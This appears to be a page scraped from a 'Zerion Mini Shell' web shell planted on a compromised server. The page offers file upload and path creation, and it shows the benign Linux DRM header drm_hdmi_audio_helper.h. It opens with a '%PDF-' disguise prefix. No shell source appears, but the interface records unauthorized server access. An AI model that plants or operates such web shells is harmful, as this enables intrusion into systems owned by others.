%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /lib/modules/5.14.0-611.11.1.el9_7.x86_64/build/include/drm/display/
Upload File :
Create Path :
Current File : //lib/modules/5.14.0-611.11.1.el9_7.x86_64/build/include/drm/display/drm_hdmi_audio_helper.h

/* SPDX-License-Identifier: MIT */

#ifndef DRM_DISPLAY_HDMI_AUDIO_HELPER_H_
#define DRM_DISPLAY_HDMI_AUDIO_HELPER_H_

#include <linux/types.h>

struct drm_connector;
struct drm_connector_hdmi_audio_funcs;

struct device;

int drm_connector_hdmi_audio_init(struct drm_connector *connector,
				  struct device *hdmi_codec_dev,
				  const struct drm_connector_hdmi_audio_funcs *funcs,
				  unsigned int max_i2s_playback_channels,
				  bool spdif_playback,
				  int sound_dai_port);
void drm_connector_hdmi_audio_plugged_notify(struct drm_connector *connector,
					     bool plugged);

#endif

Zerion Mini Shell 1.0